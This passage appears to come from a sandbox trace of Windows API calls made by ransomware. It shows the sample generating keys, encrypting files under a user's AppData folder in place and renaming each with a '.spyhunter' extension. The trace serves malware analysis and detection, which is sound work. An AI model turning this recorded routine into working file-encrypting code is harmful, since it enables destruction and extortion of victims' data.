pdwDataLen=0x57ed48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed48*=0x30) returned 1 [0151.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned 69 [0151.276] StrStrW (lpFirst="au.msi", lpSrch=".txt") returned 0x0 [0151.276] GetProcessHeap () returned 0x2c0000 [0151.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.276] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed0c*=0x2800, lpOverlapped=0x0) returned 1 [0151.520] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.520] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed0c*=0x2800, lpOverlapped=0x0) returned 1 [0151.520] GetProcessHeap () returned 0x2c0000 [0151.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.520] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.520] WriteFile (in: hFile=0x178, lpBuffer=0x57ed4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed0c, lpOverlapped=0x0 | out: lpBuffer=0x57ed4c*, lpNumberOfBytesWritten=0x57ed0c*=0x4, lpOverlapped=0x0) returned 1 [0151.623] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed0c*=0x30, lpOverlapped=0x0) returned 1 [0151.623] CloseHandle (hObject=0x178) returned 1 [0151.643] GetProcessHeap () returned 0x2c0000 [0151.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.643] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.spyhunter") returned 79 [0151.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.spyhunter")) returned 1 [0151.644] GetProcessHeap () returned 0x2c0000 [0151.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.644] GetProcessHeap () returned 0x2c0000 [0151.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.644] GetProcessHeap () returned 0x2c0000 [0151.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81030 | out: hHeap=0x2c0000) returned 1 [0151.644] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed48 | out: pbBuffer=0x57ed48) returned 1 [0151.644] GetProcessHeap () returned 0x2c0000 [0151.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.644] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed40*=0x30) returned 1 [0151.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 152 [0151.645] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".txt") returned 0x0 [0151.645] GetProcessHeap () returned 0x2c0000 [0151.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0151.645] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ed04*=0x1a0, lpOverlapped=0x0) returned 1 [0151.647] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.647] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x57ed04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ed04*=0x1a0, lpOverlapped=0x0) returned 1 [0151.647] GetProcessHeap () returned 0x2c0000 [0151.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0151.647] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.647] WriteFile (in: hFile=0x178, lpBuffer=0x57ed44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed04, lpOverlapped=0x0 | out: lpBuffer=0x57ed44*, lpNumberOfBytesWritten=0x57ed04*=0x4, lpOverlapped=0x0) returned 1 [0151.647] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed04, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed04*=0x30, lpOverlapped=0x0) returned 1 [0151.647] CloseHandle (hObject=0x178) returned 1 [0151.648] GetProcessHeap () returned 0x2c0000 [0151.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.648] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.spyhunter") returned 162 [0151.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.spyhunter")) returned 1 [0151.648] GetProcessHeap () returned 0x2c0000 [0151.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.649] GetProcessHeap () returned 0x2c0000 [0151.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.649] GetProcessHeap () returned 0x2c0000 [0151.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fec690 | out: hHeap=0x2c0000) returned 1 [0151.655] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed48 | out: pbBuffer=0x57ed48) returned 1 [0151.655] GetProcessHeap () returned 0x2c0000 [0151.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.655] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed40*=0x30) returned 1 [0151.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.656] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 152 [0151.656] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".txt") returned 0x0 [0151.656] GetProcessHeap () returned 0x2c0000 [0151.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0151.656] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ed04*=0x1a0, lpOverlapped=0x0) returned 1 [0151.657] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.657] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x57ed04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ed04*=0x1a0, lpOverlapped=0x0) returned 1 [0151.657] GetProcessHeap () returned 0x2c0000 [0151.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0151.657] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.657] WriteFile (in: hFile=0x178, lpBuffer=0x57ed44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed04, lpOverlapped=0x0 | out: lpBuffer=0x57ed44*, lpNumberOfBytesWritten=0x57ed04*=0x4, lpOverlapped=0x0) returned 1 [0151.658] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed04, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed04*=0x30, lpOverlapped=0x0) returned 1 [0151.658] CloseHandle (hObject=0x178) returned 1 [0151.658] GetProcessHeap () returned 0x2c0000 [0151.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.658] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.spyhunter") returned 162 [0151.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.spyhunter")) returned 1 [0151.659] GetProcessHeap () returned 0x2c0000 [0151.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.659] GetProcessHeap () returned 0x2c0000 [0151.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.659] GetProcessHeap () returned 0x2c0000 [0151.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fec508 | out: hHeap=0x2c0000) returned 1 [0151.659] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed40 | out: pbBuffer=0x57ed40) returned 1 [0151.659] GetProcessHeap () returned 0x2c0000 [0151.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.660] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed38*=0x30) returned 1 [0151.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.664] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 152 [0151.664] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".txt") returned 0x0 [0151.664] GetProcessHeap () returned 0x2c0000 [0151.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0151.664] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ecfc*=0x1ec, lpOverlapped=0x0) returned 1 [0151.665] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.665] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1ec, lpNumberOfBytesWritten=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ecfc*=0x1ec, lpOverlapped=0x0) returned 1 [0151.666] GetProcessHeap () returned 0x2c0000 [0151.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0151.666] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.666] WriteFile (in: hFile=0x178, lpBuffer=0x57ed3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x57ed3c*, lpNumberOfBytesWritten=0x57ecfc*=0x4, lpOverlapped=0x0) returned 1 [0151.666] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecfc*=0x30, lpOverlapped=0x0) returned 1 [0151.666] CloseHandle (hObject=0x178) returned 1 [0151.666] GetProcessHeap () returned 0x2c0000 [0151.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.666] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.spyhunter") returned 162 [0151.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.spyhunter")) returned 1 [0151.667] GetProcessHeap () returned 0x2c0000 [0151.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.667] GetProcessHeap () returned 0x2c0000 [0151.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.667] GetProcessHeap () returned 0x2c0000 [0151.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fec380 | out: hHeap=0x2c0000) returned 1 [0151.668] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed40 | out: pbBuffer=0x57ed40) returned 1 [0151.668] GetProcessHeap () returned 0x2c0000 [0151.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.668] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed38*=0x30) returned 1 [0151.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 152 [0151.668] StrStrW (lpFirst="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpSrch=".txt") returned 0x0 [0151.668] GetProcessHeap () returned 0x2c0000 [0151.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0151.668] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ecfc*=0x1ae, lpOverlapped=0x0) returned 1 [0151.670] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.670] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1ae, lpNumberOfBytesWritten=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ecfc*=0x1ae, lpOverlapped=0x0) returned 1 [0151.670] GetProcessHeap () returned 0x2c0000 [0151.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0151.670] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.670] WriteFile (in: hFile=0x178, lpBuffer=0x57ed3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x57ed3c*, lpNumberOfBytesWritten=0x57ecfc*=0x4, lpOverlapped=0x0) returned 1 [0151.670] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecfc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecfc*=0x30, lpOverlapped=0x0) returned 1 [0151.670] CloseHandle (hObject=0x178) returned 1 [0151.670] GetProcessHeap () returned 0x2c0000 [0151.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.671] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.spyhunter") returned 162 [0151.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.spyhunter")) returned 1 [0151.858] GetProcessHeap () returned 0x2c0000 [0151.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.858] GetProcessHeap () returned 0x2c0000 [0151.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.859] GetProcessHeap () returned 0x2c0000 [0151.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fec1f8 | out: hHeap=0x2c0000) returned 1 [0151.859] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed38 | out: pbBuffer=0x57ed38) returned 1 [0151.859] GetProcessHeap () returned 0x2c0000 [0151.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.859] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed30*=0x30) returned 1 [0151.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 152 [0151.859] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".txt") returned 0x0 [0151.859] GetProcessHeap () returned 0x2c0000 [0151.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.859] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ecf4*=0x18e, lpOverlapped=0x0) returned 1 [0151.860] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.860] WriteFile (in: hFile=0x178, 